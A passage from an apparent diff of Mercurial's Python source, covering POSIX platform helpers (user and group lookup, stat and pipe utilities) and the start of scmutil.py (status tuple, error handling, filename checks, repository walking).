492 return findexisting(os.path.join('/bin', command))
486
493
487 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
494 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
488 executable = findexisting(os.path.join(path, command))
495 executable = findexisting(os.path.join(path, command))
489 if executable is not None:
496 if executable is not None:
490 return executable
497 return executable
491 return None
498 return None
492
499
493 def setsignalhandler():
500 def setsignalhandler():
494 pass
501 pass
495
502
496 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
503 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
497
504
498 def statfiles(files):
505 def statfiles(files):
499 '''Stat each file in files. Yield each stat, or None if a file does not
506 '''Stat each file in files. Yield each stat, or None if a file does not
500 exist or has a type we don't care about.'''
507 exist or has a type we don't care about.'''
501 lstat = os.lstat
508 lstat = os.lstat
502 getkind = stat.S_IFMT
509 getkind = stat.S_IFMT
503 for nf in files:
510 for nf in files:
504 try:
511 try:
505 st = lstat(nf)
512 st = lstat(nf)
506 if getkind(st.st_mode) not in _wantedkinds:
513 if getkind(st.st_mode) not in _wantedkinds:
507 st = None
514 st = None
508 except OSError as err:
515 except OSError as err:
509 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
516 if err.errno not in (errno.ENOENT, errno.ENOTDIR):
510 raise
517 raise
511 st = None
518 st = None
512 yield st
519 yield st
513
520
514 def getuser():
521 def getuser():
515 '''return name of current user'''
522 '''return name of current user'''
516 return pycompat.fsencode(getpass.getuser())
523 return pycompat.fsencode(getpass.getuser())
517
524
518 def username(uid=None):
525 def username(uid=None):
519 """Return the name of the user with the given uid.
526 """Return the name of the user with the given uid.
520
527
521 If uid is None, return the name of the current user."""
528 If uid is None, return the name of the current user."""
522
529
523 if uid is None:
530 if uid is None:
524 uid = os.getuid()
531 uid = os.getuid()
525 try:
532 try:
526 return pwd.getpwuid(uid)[0]
533 return pwd.getpwuid(uid)[0]
527 except KeyError:
534 except KeyError:
528 return str(uid)
535 return str(uid)
529
536
530 def groupname(gid=None):
537 def groupname(gid=None):
531 """Return the name of the group with the given gid.
538 """Return the name of the group with the given gid.
532
539
533 If gid is None, return the name of the current group."""
540 If gid is None, return the name of the current group."""
534
541
535 if gid is None:
542 if gid is None:
536 gid = os.getgid()
543 gid = os.getgid()
537 try:
544 try:
538 return grp.getgrgid(gid)[0]
545 return grp.getgrgid(gid)[0]
539 except KeyError:
546 except KeyError:
540 return str(gid)
547 return str(gid)
541
548
542 def groupmembers(name):
549 def groupmembers(name):
543 """Return the list of members of the group with the given
550 """Return the list of members of the group with the given
544 name, KeyError if the group does not exist.
551 name, KeyError if the group does not exist.
545 """
552 """
546 return list(grp.getgrnam(name).gr_mem)
553 return list(grp.getgrnam(name).gr_mem)
547
554
548 def spawndetached(args):
555 def spawndetached(args):
549 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
556 return os.spawnvp(os.P_NOWAIT | getattr(os, 'P_DETACH', 0),
550 args[0], args)
557 args[0], args)
551
558
552 def gethgcmd():
559 def gethgcmd():
553 return sys.argv[:1]
560 return sys.argv[:1]
554
561
555 def makedir(path, notindexed):
562 def makedir(path, notindexed):
556 os.mkdir(path)
563 os.mkdir(path)
557
564
558 def lookupreg(key, name=None, scope=None):
565 def lookupreg(key, name=None, scope=None):
559 return None
566 return None
560
567
561 def hidewindow():
568 def hidewindow():
562 """Hide current shell window.
569 """Hide current shell window.
563
570
564 Used to hide the window opened when starting asynchronous
571 Used to hide the window opened when starting asynchronous
565 child process under Windows, unneeded on other systems.
572 child process under Windows, unneeded on other systems.
566 """
573 """
567 pass
574 pass
568
575
569 class cachestat(object):
576 class cachestat(object):
570 def __init__(self, path):
577 def __init__(self, path):
571 self.stat = os.stat(path)
578 self.stat = os.stat(path)
572
579
573 def cacheable(self):
580 def cacheable(self):
574 return bool(self.stat.st_ino)
581 return bool(self.stat.st_ino)
575
582
576 __hash__ = object.__hash__
583 __hash__ = object.__hash__
577
584
578 def __eq__(self, other):
585 def __eq__(self, other):
579 try:
586 try:
580 # Only dev, ino, size, mtime and atime are likely to change. Out
587 # Only dev, ino, size, mtime and atime are likely to change. Out
581 # of these, we shouldn't compare atime but should compare the
588 # of these, we shouldn't compare atime but should compare the
582 # rest. However, one of the other fields changing indicates
589 # rest. However, one of the other fields changing indicates
583 # something fishy going on, so return False if anything but atime
590 # something fishy going on, so return False if anything but atime
584 # changes.
591 # changes.
585 return (self.stat.st_mode == other.stat.st_mode and
592 return (self.stat.st_mode == other.stat.st_mode and
586 self.stat.st_ino == other.stat.st_ino and
593 self.stat.st_ino == other.stat.st_ino and
587 self.stat.st_dev == other.stat.st_dev and
594 self.stat.st_dev == other.stat.st_dev and
588 self.stat.st_nlink == other.stat.st_nlink and
595 self.stat.st_nlink == other.stat.st_nlink and
589 self.stat.st_uid == other.stat.st_uid and
596 self.stat.st_uid == other.stat.st_uid and
590 self.stat.st_gid == other.stat.st_gid and
597 self.stat.st_gid == other.stat.st_gid and
591 self.stat.st_size == other.stat.st_size and
598 self.stat.st_size == other.stat.st_size and
592 self.stat.st_mtime == other.stat.st_mtime and
599 self.stat.st_mtime == other.stat.st_mtime and
593 self.stat.st_ctime == other.stat.st_ctime)
600 self.stat.st_ctime == other.stat.st_ctime)
594 except AttributeError:
601 except AttributeError:
595 return False
602 return False
596
603
597 def __ne__(self, other):
604 def __ne__(self, other):
598 return not self == other
605 return not self == other
599
606
600 def executablepath():
607 def executablepath():
601 return None # available on Windows only
608 return None # available on Windows only
602
609
603 def statislink(st):
610 def statislink(st):
604 '''check whether a stat result is a symlink'''
611 '''check whether a stat result is a symlink'''
605 return st and stat.S_ISLNK(st.st_mode)
612 return st and stat.S_ISLNK(st.st_mode)
606
613
607 def statisexec(st):
614 def statisexec(st):
608 '''check whether a stat result is an executable file'''
615 '''check whether a stat result is an executable file'''
609 return st and (st.st_mode & 0o100 != 0)
616 return st and (st.st_mode & 0o100 != 0)
610
617
611 def poll(fds):
618 def poll(fds):
612 """block until something happens on any file descriptor
619 """block until something happens on any file descriptor
613
620
614 This is a generic helper that will check for any activity
621 This is a generic helper that will check for any activity
615 (read, write. exception) and return the list of touched files.
622 (read, write. exception) and return the list of touched files.
616
623
617 In unsupported cases, it will raise a NotImplementedError"""
624 In unsupported cases, it will raise a NotImplementedError"""
618 try:
625 try:
619 while True:
626 while True:
620 try:
627 try:
621 res = select.select(fds, fds, fds)
628 res = select.select(fds, fds, fds)
622 break
629 break
623 except select.error as inst:
630 except select.error as inst:
624 if inst.args[0] == errno.EINTR:
631 if inst.args[0] == errno.EINTR:
625 continue
632 continue
626 raise
633 raise
627 except ValueError: # out of range file descriptor
634 except ValueError: # out of range file descriptor
628 raise NotImplementedError()
635 raise NotImplementedError()
629 return sorted(list(set(sum(res, []))))
636 return sorted(list(set(sum(res, []))))
630
637
631 def readpipe(pipe):
638 def readpipe(pipe):
632 """Read all available data from a pipe."""
639 """Read all available data from a pipe."""
633 # We can't fstat() a pipe because Linux will always report 0.
640 # We can't fstat() a pipe because Linux will always report 0.
634 # So, we set the pipe to non-blocking mode and read everything
641 # So, we set the pipe to non-blocking mode and read everything
635 # that's available.
642 # that's available.
636 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
643 flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
637 flags |= os.O_NONBLOCK
644 flags |= os.O_NONBLOCK
638 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
645 oldflags = fcntl.fcntl(pipe, fcntl.F_SETFL, flags)
639
646
640 try:
647 try:
641 chunks = []
648 chunks = []
642 while True:
649 while True:
643 try:
650 try:
644 s = pipe.read()
651 s = pipe.read()
645 if not s:
652 if not s:
646 break
653 break
647 chunks.append(s)
654 chunks.append(s)
648 except IOError:
655 except IOError:
649 break
656 break
650
657
651 return ''.join(chunks)
658 return ''.join(chunks)
652 finally:
659 finally:
653 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
660 fcntl.fcntl(pipe, fcntl.F_SETFL, oldflags)
654
661
655 def bindunixsocket(sock, path):
662 def bindunixsocket(sock, path):
656 """Bind the UNIX domain socket to the specified path"""
663 """Bind the UNIX domain socket to the specified path"""
657 # use relative path instead of full path at bind() if possible, since
664 # use relative path instead of full path at bind() if possible, since
658 # AF_UNIX path has very small length limit (107 chars) on common
665 # AF_UNIX path has very small length limit (107 chars) on common
659 # platforms (see sys/un.h)
666 # platforms (see sys/un.h)
660 dirname, basename = os.path.split(path)
667 dirname, basename = os.path.split(path)
661 bakwdfd = None
668 bakwdfd = None
662 if dirname:
669 if dirname:
663 bakwdfd = os.open('.', os.O_DIRECTORY)
670 bakwdfd = os.open('.', os.O_DIRECTORY)
664 os.chdir(dirname)
671 os.chdir(dirname)
665 sock.bind(basename)
672 sock.bind(basename)
666 if bakwdfd:
673 if bakwdfd:
667 os.fchdir(bakwdfd)
674 os.fchdir(bakwdfd)
668 os.close(bakwdfd)
675 os.close(bakwdfd)
@@ -1,1105 +1,1105 b''
1 # scmutil.py - Mercurial core utility functions
1 # scmutil.py - Mercurial core utility functions
2 #
2 #
3 # Copyright Matt Mackall <mpm@selenic.com>
3 # Copyright Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import glob
11 import glob
12 import hashlib
12 import hashlib
13 import os
13 import os
14 import re
14 import re
15 import socket
15 import socket
16 import weakref
16 import weakref
17
17
18 from .i18n import _
18 from .i18n import _
19 from .node import (
19 from .node import (
20 hex,
20 hex,
21 nullid,
21 nullid,
22 wdirid,
22 wdirid,
23 wdirrev,
23 wdirrev,
24 )
24 )
25
25
26 from . import (
26 from . import (
27 encoding,
27 encoding,
28 error,
28 error,
29 match as matchmod,
29 match as matchmod,
30 obsolete,
30 obsolete,
31 obsutil,
31 obsutil,
32 pathutil,
32 pathutil,
33 phases,
33 phases,
34 pycompat,
34 pycompat,
35 revsetlang,
35 revsetlang,
36 similar,
36 similar,
37 util,
37 util,
38 )
38 )
39
39
40 if pycompat.osname == 'nt':
40 if pycompat.osname == 'nt':
41 from . import scmwindows as scmplatform
41 from . import scmwindows as scmplatform
42 else:
42 else:
43 from . import scmposix as scmplatform
43 from . import scmposix as scmplatform
44
44
45 termsize = scmplatform.termsize
45 termsize = scmplatform.termsize
46
46
47 class status(tuple):
47 class status(tuple):
48 '''Named tuple with a list of files per status. The 'deleted', 'unknown'
48 '''Named tuple with a list of files per status. The 'deleted', 'unknown'
49 and 'ignored' properties are only relevant to the working copy.
49 and 'ignored' properties are only relevant to the working copy.
50 '''
50 '''
51
51
52 __slots__ = ()
52 __slots__ = ()
53
53
54 def __new__(cls, modified, added, removed, deleted, unknown, ignored,
54 def __new__(cls, modified, added, removed, deleted, unknown, ignored,
55 clean):
55 clean):
56 return tuple.__new__(cls, (modified, added, removed, deleted, unknown,
56 return tuple.__new__(cls, (modified, added, removed, deleted, unknown,
57 ignored, clean))
57 ignored, clean))
58
58
59 @property
59 @property
60 def modified(self):
60 def modified(self):
61 '''files that have been modified'''
61 '''files that have been modified'''
62 return self[0]
62 return self[0]
63
63
64 @property
64 @property
65 def added(self):
65 def added(self):
66 '''files that have been added'''
66 '''files that have been added'''
67 return self[1]
67 return self[1]
68
68
69 @property
69 @property
70 def removed(self):
70 def removed(self):
71 '''files that have been removed'''
71 '''files that have been removed'''
72 return self[2]
72 return self[2]
73
73
74 @property
74 @property
75 def deleted(self):
75 def deleted(self):
76 '''files that are in the dirstate, but have been deleted from the
76 '''files that are in the dirstate, but have been deleted from the
77 working copy (aka "missing")
77 working copy (aka "missing")
78 '''
78 '''
79 return self[3]
79 return self[3]
80
80
81 @property
81 @property
82 def unknown(self):
82 def unknown(self):
83 '''files not in the dirstate that are not ignored'''
83 '''files not in the dirstate that are not ignored'''
84 return self[4]
84 return self[4]
85
85
86 @property
86 @property
87 def ignored(self):
87 def ignored(self):
88 '''files not in the dirstate that are ignored (by _dirignore())'''
88 '''files not in the dirstate that are ignored (by _dirignore())'''
89 return self[5]
89 return self[5]
90
90
91 @property
91 @property
92 def clean(self):
92 def clean(self):
93 '''files that have not been modified'''
93 '''files that have not been modified'''
94 return self[6]
94 return self[6]
95
95
96 def __repr__(self, *args, **kwargs):
96 def __repr__(self, *args, **kwargs):
97 return (('<status modified=%r, added=%r, removed=%r, deleted=%r, '
97 return (('<status modified=%r, added=%r, removed=%r, deleted=%r, '
98 'unknown=%r, ignored=%r, clean=%r>') % self)
98 'unknown=%r, ignored=%r, clean=%r>') % self)
99
99
100 def itersubrepos(ctx1, ctx2):
100 def itersubrepos(ctx1, ctx2):
101 """find subrepos in ctx1 or ctx2"""
101 """find subrepos in ctx1 or ctx2"""
102 # Create a (subpath, ctx) mapping where we prefer subpaths from
102 # Create a (subpath, ctx) mapping where we prefer subpaths from
103 # ctx1. The subpaths from ctx2 are important when the .hgsub file
103 # ctx1. The subpaths from ctx2 are important when the .hgsub file
104 # has been modified (in ctx2) but not yet committed (in ctx1).
104 # has been modified (in ctx2) but not yet committed (in ctx1).
105 subpaths = dict.fromkeys(ctx2.substate, ctx2)
105 subpaths = dict.fromkeys(ctx2.substate, ctx2)
106 subpaths.update(dict.fromkeys(ctx1.substate, ctx1))
106 subpaths.update(dict.fromkeys(ctx1.substate, ctx1))
107
107
108 missing = set()
108 missing = set()
109
109
110 for subpath in ctx2.substate:
110 for subpath in ctx2.substate:
111 if subpath not in ctx1.substate:
111 if subpath not in ctx1.substate:
112 del subpaths[subpath]
112 del subpaths[subpath]
113 missing.add(subpath)
113 missing.add(subpath)
114
114
115 for subpath, ctx in sorted(subpaths.iteritems()):
115 for subpath, ctx in sorted(subpaths.iteritems()):
116 yield subpath, ctx.sub(subpath)
116 yield subpath, ctx.sub(subpath)
117
117
118 # Yield an empty subrepo based on ctx1 for anything only in ctx2. That way,
118 # Yield an empty subrepo based on ctx1 for anything only in ctx2. That way,
119 # status and diff will have an accurate result when it does
119 # status and diff will have an accurate result when it does
120 # 'sub.{status|diff}(rev2)'. Otherwise, the ctx2 subrepo is compared
120 # 'sub.{status|diff}(rev2)'. Otherwise, the ctx2 subrepo is compared
121 # against itself.
121 # against itself.
122 for subpath in missing:
122 for subpath in missing:
123 yield subpath, ctx2.nullsub(subpath, ctx1)
123 yield subpath, ctx2.nullsub(subpath, ctx1)
124
124
125 def nochangesfound(ui, repo, excluded=None):
125 def nochangesfound(ui, repo, excluded=None):
126 '''Report no changes for push/pull, excluded is None or a list of
126 '''Report no changes for push/pull, excluded is None or a list of
127 nodes excluded from the push/pull.
127 nodes excluded from the push/pull.
128 '''
128 '''
129 secretlist = []
129 secretlist = []
130 if excluded:
130 if excluded:
131 for n in excluded:
131 for n in excluded:
132 ctx = repo[n]
132 ctx = repo[n]
133 if ctx.phase() >= phases.secret and not ctx.extinct():
133 if ctx.phase() >= phases.secret and not ctx.extinct():
134 secretlist.append(n)
134 secretlist.append(n)
135
135
136 if secretlist:
136 if secretlist:
137 ui.status(_("no changes found (ignored %d secret changesets)\n")
137 ui.status(_("no changes found (ignored %d secret changesets)\n")
138 % len(secretlist))
138 % len(secretlist))
139 else:
139 else:
140 ui.status(_("no changes found\n"))
140 ui.status(_("no changes found\n"))
141
141
142 def callcatch(ui, func):
142 def callcatch(ui, func):
143 """call func() with global exception handling
143 """call func() with global exception handling
144
144
145 return func() if no exception happens. otherwise do some error handling
145 return func() if no exception happens. otherwise do some error handling
146 and return an exit code accordingly. does not handle all exceptions.
146 and return an exit code accordingly. does not handle all exceptions.
147 """
147 """
148 try:
148 try:
149 try:
149 try:
150 return func()
150 return func()
151 except: # re-raises
151 except: # re-raises
152 ui.traceback()
152 ui.traceback()
153 raise
153 raise
154 # Global exception handling, alphabetically
154 # Global exception handling, alphabetically
155 # Mercurial-specific first, followed by built-in and library exceptions
155 # Mercurial-specific first, followed by built-in and library exceptions
156 except error.LockHeld as inst:
156 except error.LockHeld as inst:
157 if inst.errno == errno.ETIMEDOUT:
157 if inst.errno == errno.ETIMEDOUT:
158 reason = _('timed out waiting for lock held by %r') % inst.locker
158 reason = _('timed out waiting for lock held by %r') % inst.locker
159 else:
159 else:
160 reason = _('lock held by %r') % inst.locker
160 reason = _('lock held by %r') % inst.locker
161 ui.warn(_("abort: %s: %s\n") % (inst.desc or inst.filename, reason))
161 ui.warn(_("abort: %s: %s\n") % (inst.desc or inst.filename, reason))
162 if not inst.locker:
162 if not inst.locker:
163 ui.warn(_("(lock might be very busy)\n"))
163 ui.warn(_("(lock might be very busy)\n"))
164 except error.LockUnavailable as inst:
164 except error.LockUnavailable as inst:
165 ui.warn(_("abort: could not lock %s: %s\n") %
165 ui.warn(_("abort: could not lock %s: %s\n") %
166 (inst.desc or inst.filename, inst.strerror))
166 (inst.desc or inst.filename, inst.strerror))
167 except error.OutOfBandError as inst:
167 except error.OutOfBandError as inst:
168 if inst.args:
168 if inst.args:
169 msg = _("abort: remote error:\n")
169 msg = _("abort: remote error:\n")
170 else:
170 else:
171 msg = _("abort: remote error\n")
171 msg = _("abort: remote error\n")
172 ui.warn(msg)
172 ui.warn(msg)
173 if inst.args:
173 if inst.args:
174 ui.warn(''.join(inst.args))
174 ui.warn(''.join(inst.args))
175 if inst.hint:
175 if inst.hint:
176 ui.warn('(%s)\n' % inst.hint)
176 ui.warn('(%s)\n' % inst.hint)
177 except error.RepoError as inst:
177 except error.RepoError as inst:
178 ui.warn(_("abort: %s!\n") % inst)
178 ui.warn(_("abort: %s!\n") % inst)
179 if inst.hint:
179 if inst.hint:
180 ui.warn(_("(%s)\n") % inst.hint)
180 ui.warn(_("(%s)\n") % inst.hint)
181 except error.ResponseError as inst:
181 except error.ResponseError as inst:
182 ui.warn(_("abort: %s") % inst.args[0])
182 ui.warn(_("abort: %s") % inst.args[0])
183 if not isinstance(inst.args[1], basestring):
183 if not isinstance(inst.args[1], basestring):
184 ui.warn(" %r\n" % (inst.args[1],))
184 ui.warn(" %r\n" % (inst.args[1],))
185 elif not inst.args[1]:
185 elif not inst.args[1]:
186 ui.warn(_(" empty string\n"))
186 ui.warn(_(" empty string\n"))
187 else:
187 else:
188 ui.warn("\n%r\n" % util.ellipsis(inst.args[1]))
188 ui.warn("\n%r\n" % util.ellipsis(inst.args[1]))
189 except error.CensoredNodeError as inst:
189 except error.CensoredNodeError as inst:
190 ui.warn(_("abort: file censored %s!\n") % inst)
190 ui.warn(_("abort: file censored %s!\n") % inst)
191 except error.RevlogError as inst:
191 except error.RevlogError as inst:
192 ui.warn(_("abort: %s!\n") % inst)
192 ui.warn(_("abort: %s!\n") % inst)
193 except error.InterventionRequired as inst:
193 except error.InterventionRequired as inst:
194 ui.warn("%s\n" % inst)
194 ui.warn("%s\n" % inst)
195 if inst.hint:
195 if inst.hint:
196 ui.warn(_("(%s)\n") % inst.hint)
196 ui.warn(_("(%s)\n") % inst.hint)
197 return 1
197 return 1
198 except error.WdirUnsupported:
198 except error.WdirUnsupported:
199 ui.warn(_("abort: working directory revision cannot be specified\n"))
199 ui.warn(_("abort: working directory revision cannot be specified\n"))
200 except error.Abort as inst:
200 except error.Abort as inst:
201 ui.warn(_("abort: %s\n") % inst)
201 ui.warn(_("abort: %s\n") % inst)
202 if inst.hint:
202 if inst.hint:
203 ui.warn(_("(%s)\n") % inst.hint)
203 ui.warn(_("(%s)\n") % inst.hint)
204 except ImportError as inst:
204 except ImportError as inst:
205 ui.warn(_("abort: %s!\n") % inst)
205 ui.warn(_("abort: %s!\n") % inst)
206 m = str(inst).split()[-1]
206 m = str(inst).split()[-1]
207 if m in "mpatch bdiff".split():
207 if m in "mpatch bdiff".split():
208 ui.warn(_("(did you forget to compile extensions?)\n"))
208 ui.warn(_("(did you forget to compile extensions?)\n"))
209 elif m in "zlib".split():
209 elif m in "zlib".split():
210 ui.warn(_("(is your Python install correct?)\n"))
210 ui.warn(_("(is your Python install correct?)\n"))
211 except IOError as inst:
211 except IOError as inst:
212 if util.safehasattr(inst, "code"):
212 if util.safehasattr(inst, "code"):
213 ui.warn(_("abort: %s\n") % inst)
213 ui.warn(_("abort: %s\n") % inst)
214 elif util.safehasattr(inst, "reason"):
214 elif util.safehasattr(inst, "reason"):
215 try: # usually it is in the form (errno, strerror)
215 try: # usually it is in the form (errno, strerror)
216 reason = inst.reason.args[1]
216 reason = inst.reason.args[1]
217 except (AttributeError, IndexError):
217 except (AttributeError, IndexError):
218 # it might be anything, for example a string
218 # it might be anything, for example a string
219 reason = inst.reason
219 reason = inst.reason
220 if isinstance(reason, unicode):
220 if isinstance(reason, unicode):
221 # SSLError of Python 2.7.9 contains a unicode
221 # SSLError of Python 2.7.9 contains a unicode
222 reason = encoding.unitolocal(reason)
222 reason = encoding.unitolocal(reason)
223 ui.warn(_("abort: error: %s\n") % reason)
223 ui.warn(_("abort: error: %s\n") % reason)
224 elif (util.safehasattr(inst, "args")
224 elif (util.safehasattr(inst, "args")
225 and inst.args and inst.args[0] == errno.EPIPE):
225 and inst.args and inst.args[0] == errno.EPIPE):
226 pass
226 pass
227 elif getattr(inst, "strerror", None):
227 elif getattr(inst, "strerror", None):
228 if getattr(inst, "filename", None):
228 if getattr(inst, "filename", None):
229 ui.warn(_("abort: %s: %s\n") % (inst.strerror, inst.filename))
229 ui.warn(_("abort: %s: %s\n") % (inst.strerror, inst.filename))
230 else:
230 else:
231 ui.warn(_("abort: %s\n") % inst.strerror)
231 ui.warn(_("abort: %s\n") % inst.strerror)
232 else:
232 else:
233 raise
233 raise
234 except OSError as inst:
234 except OSError as inst:
235 if getattr(inst, "filename", None) is not None:
235 if getattr(inst, "filename", None) is not None:
236 ui.warn(_("abort: %s: '%s'\n") % (inst.strerror, inst.filename))
236 ui.warn(_("abort: %s: '%s'\n") % (inst.strerror, inst.filename))
237 else:
237 else:
238 ui.warn(_("abort: %s\n") % inst.strerror)
238 ui.warn(_("abort: %s\n") % inst.strerror)
239 except MemoryError:
239 except MemoryError:
240 ui.warn(_("abort: out of memory\n"))
240 ui.warn(_("abort: out of memory\n"))
241 except SystemExit as inst:
241 except SystemExit as inst:
242 # Commands shouldn't sys.exit directly, but give a return code.
242 # Commands shouldn't sys.exit directly, but give a return code.
243 # Just in case catch this and and pass exit code to caller.
243 # Just in case catch this and and pass exit code to caller.
244 return inst.code
244 return inst.code
245 except socket.error as inst:
245 except socket.error as inst:
246 ui.warn(_("abort: %s\n") % inst.args[-1])
246 ui.warn(_("abort: %s\n") % inst.args[-1])
247
247
248 return -1
248 return -1
249
249
250 def checknewlabel(repo, lbl, kind):
250 def checknewlabel(repo, lbl, kind):
251 # Do not use the "kind" parameter in ui output.
251 # Do not use the "kind" parameter in ui output.
252 # It makes strings difficult to translate.
252 # It makes strings difficult to translate.
253 if lbl in ['tip', '.', 'null']:
253 if lbl in ['tip', '.', 'null']:
254 raise error.Abort(_("the name '%s' is reserved") % lbl)
254 raise error.Abort(_("the name '%s' is reserved") % lbl)
255 for c in (':', '\0', '\n', '\r'):
255 for c in (':', '\0', '\n', '\r'):
256 if c in lbl:
256 if c in lbl:
257 raise error.Abort(_("%r cannot be used in a name") % c)
257 raise error.Abort(_("%r cannot be used in a name") % c)
258 try:
258 try:
259 int(lbl)
259 int(lbl)
260 raise error.Abort(_("cannot use an integer as a name"))
260 raise error.Abort(_("cannot use an integer as a name"))
261 except ValueError:
261 except ValueError:
262 pass
262 pass
263
263
264 def checkfilename(f):
264 def checkfilename(f):
265 '''Check that the filename f is an acceptable filename for a tracked file'''
265 '''Check that the filename f is an acceptable filename for a tracked file'''
266 if '\r' in f or '\n' in f:
266 if '\r' in f or '\n' in f:
267 raise error.Abort(_("'\\n' and '\\r' disallowed in filenames: %r") % f)
267 raise error.Abort(_("'\\n' and '\\r' disallowed in filenames: %r") % f)
268
268
269 def checkportable(ui, f):
269 def checkportable(ui, f):
270 '''Check if filename f is portable and warn or abort depending on config'''
270 '''Check if filename f is portable and warn or abort depending on config'''
271 checkfilename(f)
271 checkfilename(f)
272 abort, warn = checkportabilityalert(ui)
272 abort, warn = checkportabilityalert(ui)
273 if abort or warn:
273 if abort or warn:
274 msg = util.checkwinfilename(f)
274 msg = util.checkwinfilename(f)
275 if msg:
275 if msg:
276 msg = "%s: %r" % (msg, f)
276 msg = "%s: %r" % (msg, f)
277 if abort:
277 if abort:
278 raise error.Abort(msg)
278 raise error.Abort(msg)
279 ui.warn(_("warning: %s\n") % msg)
279 ui.warn(_("warning: %s\n") % msg)
280
280
281 def checkportabilityalert(ui):
281 def checkportabilityalert(ui):
282 '''check if the user's config requests nothing, a warning, or abort for
282 '''check if the user's config requests nothing, a warning, or abort for
283 non-portable filenames'''
283 non-portable filenames'''
284 val = ui.config('ui', 'portablefilenames')
284 val = ui.config('ui', 'portablefilenames')
285 lval = val.lower()
285 lval = val.lower()
286 bval = util.parsebool(val)
286 bval = util.parsebool(val)
287 abort = pycompat.osname == 'nt' or lval == 'abort'
287 abort = pycompat.osname == 'nt' or lval == 'abort'
288 warn = bval or lval == 'warn'
288 warn = bval or lval == 'warn'
289 if bval is None and not (warn or abort or lval == 'ignore'):
289 if bval is None and not (warn or abort or lval == 'ignore'):
290 raise error.ConfigError(
290 raise error.ConfigError(
291 _("ui.portablefilenames value is invalid ('%s')") % val)
291 _("ui.portablefilenames value is invalid ('%s')") % val)
292 return abort, warn
292 return abort, warn
293
293
294 class casecollisionauditor(object):
294 class casecollisionauditor(object):
295 def __init__(self, ui, abort, dirstate):
295 def __init__(self, ui, abort, dirstate):
296 self._ui = ui
296 self._ui = ui
297 self._abort = abort
297 self._abort = abort
298 allfiles = '\0'.join(dirstate._map)
298 allfiles = '\0'.join(dirstate._map)
299 self._loweredfiles = set(encoding.lower(allfiles).split('\0'))
299 self._loweredfiles = set(encoding.lower(allfiles).split('\0'))
300 self._dirstate = dirstate
300 self._dirstate = dirstate
301 # The purpose of _newfiles is so that we don't complain about
301 # The purpose of _newfiles is so that we don't complain about
302 # case collisions if someone were to call this object with the
302 # case collisions if someone were to call this object with the
303 # same filename twice.
303 # same filename twice.
304 self._newfiles = set()
304 self._newfiles = set()
305
305
306 def __call__(self, f):
306 def __call__(self, f):
307 if f in self._newfiles:
307 if f in self._newfiles:
308 return
308 return
309 fl = encoding.lower(f)
309 fl = encoding.lower(f)
310 if fl in self._loweredfiles and f not in self._dirstate:
310 if fl in self._loweredfiles and f not in self._dirstate:
311 msg = _('possible case-folding collision for %s') % f
311 msg = _('possible case-folding collision for %s') % f
312 if self._abort:
312 if self._abort:
313 raise error.Abort(msg)
313 raise error.Abort(msg)
314 self._ui.warn(_("warning: %s\n") % msg)
314 self._ui.warn(_("warning: %s\n") % msg)
315 self._loweredfiles.add(fl)
315 self._loweredfiles.add(fl)
316 self._newfiles.add(f)
316 self._newfiles.add(f)
317
317
318 def filteredhash(repo, maxrev):
318 def filteredhash(repo, maxrev):
319 """build hash of filtered revisions in the current repoview.
319 """build hash of filtered revisions in the current repoview.
320
320
321 Multiple caches perform up-to-date validation by checking that the
321 Multiple caches perform up-to-date validation by checking that the
322 tiprev and tipnode stored in the cache file match the current repository.
322 tiprev and tipnode stored in the cache file match the current repository.
323 However, this is not sufficient for validating repoviews because the set
323 However, this is not sufficient for validating repoviews because the set
324 of revisions in the view may change without the repository tiprev and
324 of revisions in the view may change without the repository tiprev and
325 tipnode changing.
325 tipnode changing.
326
326
327 This function hashes all the revs filtered from the view and returns
327 This function hashes all the revs filtered from the view and returns
328 that SHA-1 digest.
328 that SHA-1 digest.
329 """
329 """
330 cl = repo.changelog
330 cl = repo.changelog
331 if not cl.filteredrevs:
331 if not cl.filteredrevs:
332 return None
332 return None
333 key = None
333 key = None
334 revs = sorted(r for r in cl.filteredrevs if r <= maxrev)
334 revs = sorted(r for r in cl.filteredrevs if r <= maxrev)
335 if revs:
335 if revs:
336 s = hashlib.sha1()
336 s = hashlib.sha1()
337 for rev in revs:
337 for rev in revs:
338 s.update('%d;' % rev)
338 s.update('%d;' % rev)
339 key = s.digest()
339 key = s.digest()
340 return key
340 return key
341
341
342 def walkrepos(path, followsym=False, seen_dirs=None, recurse=False):
342 def walkrepos(path, followsym=False, seen_dirs=None, recurse=False):
343 '''yield every hg repository under path, always recursively.
343 '''yield every hg repository under path, always recursively.
344 The recurse flag will only control recursion into repo working dirs'''
344 The recurse flag will only control recursion into repo working dirs'''
345 def errhandler(err):
345 def errhandler(err):
346 if err.filename == path:
346 if err.filename == path:
347 raise err
347 raise err
348 samestat = getattr(os.path, 'samestat', None)
348 samestat = getattr(os.path, 'samestat', None)
349 if followsym and samestat is not None:
349 if followsym and samestat is not None:
350 def adddir(dirlst, dirname):
350 def adddir(dirlst, dirname):
351 match = False
351 match = False
352 dirstat = os.stat(dirname)
352 dirstat = os.stat(dirname)
353 for lstdirstat in dirlst:
353 for lstdirstat in dirlst:
354 if samestat(dirstat, lstdirstat):
354 if samestat(dirstat, lstdirstat):
355 match = True
355 match = True
356 break
356 break
357 if not match:
357 if not match:
358 dirlst.append(dirstat)
358 dirlst.append(dirstat)
359 return not match
359 return not match
360 else:
360 else:
361 followsym = False
361 followsym = False
362
362
363 if (seen_dirs is None) and followsym:
363 if (seen_dirs is None) and followsym:
364 seen_dirs = []
364 seen_dirs = []
365 adddir(seen_dirs, path)
365 adddir(seen_dirs, path)
366 for root, dirs, files in os.walk(path, topdown=True, onerror=errhandler):
366 for root, dirs, files in os.walk(path, topdown=True, onerror=errhandler):
367 dirs.sort()
367 dirs.sort()
368 if '.hg' in dirs:
368 if '.hg' in dirs:
